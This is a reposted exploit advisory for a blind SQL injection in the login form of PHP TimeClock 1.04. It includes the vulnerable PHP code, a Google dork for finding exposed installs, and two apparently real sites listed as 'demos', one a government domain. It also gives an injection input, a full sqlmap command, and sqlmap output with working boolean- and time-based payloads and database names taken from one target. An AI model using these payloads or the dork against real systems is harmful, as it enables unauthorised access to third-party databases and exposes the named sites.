PHP TimeClock 1.04 - Blind SQL Injection Vulnerability

2016.01.24
Credit: Blast3r_ma
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ # Exploit Title: PHP TimeClock 1.04 - Blind SQL Injection Vulnerability # Google Dork: intitle:"PHP timeclock 1.04" intext:"PHP Timeclock Admin Login" inurl:"login.php" # Date: 23-1-2016 # Twitter :D : https://twitter.com/Blast3r_ma # Exploit Author: Blast3r_ma # Software Link: http://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ #Tested on: Linux # Version: 1.04 ################################################ ============ Error line's in login.php =========================== if (isset($_POST['login_userid']) && (isset($_POST['login_password']))) { $login_userid = $_POST['login_userid']; $login_password = crypt($_POST['login_password'], 'xy'); $query = "select empfullname, employee_passwd, admin, time_admin from ".$db_prefix."employees where empfullname = '".$login_userid."'"; $result = mysql_query($query); while ($row=mysql_fetch_array($result)) { $admin_username = "".$row['empfullname'].""; $admin_password = "".$row['employee_passwd'].""; $admin_auth = "".$row['admin'].""; $time_admin_auth = "".$row['time_admin'].""; } ====================================================================== ======================== Demos: ============================ http://www.quecomputersmankato.com/timeclock/login.php http://www.pontoweb.ac.gov.br/login.php ... ======================================================================= ================== PoC-Exploit ================== http://<target>/timeclock-1.04/login.php or http://<target>/login.php User: lll' PW: notimportant Exploit Code:sqlmap --url="http://www.Target.com/login.php" --data="login_userid=admin&login_password=slkdjfslkdjf" -p login_userid --random-agent --level=5 --risk=3 --dbs ============================================================ Result ============================================== sqlmap identified the following injection point(s) with a total of 1147 HTTP(s) requests: --- Parameter: login_userid (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: login_userid=admin' RLIKE (SELECT (CASE WHEN (3926=3926) THEN 0x61646d696e ELSE 0x28 END)) AND 'hICG'='hICG&login_password=slkdjfslkdjf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: login_userid=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ZvHA) AND 'HGpb'='HGpb&login_password=slkdjfslkdjf --- [14:03:23] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.3, Apache back-end DBMS: MySQL 5.0.12 [14:03:23] [INFO] fetching database names [14:03:23] [INFO] fetching number of databases [14:03:23] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [14:03:23] [INFO] retrieved: 5 [14:03:28] [INFO] retrieved: information_schema [14:05:15] [INFO] retrieved: mysql [14:05:54] [INFO] retrieved: pontoweb [14:07:06] [INFO] retrieved: recebimento [14:08:35] [INFO] retrieved: test available databases [5]: [*] information_schema [*] mysql [*] pontoweb [*] recebimento [*] test ===================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top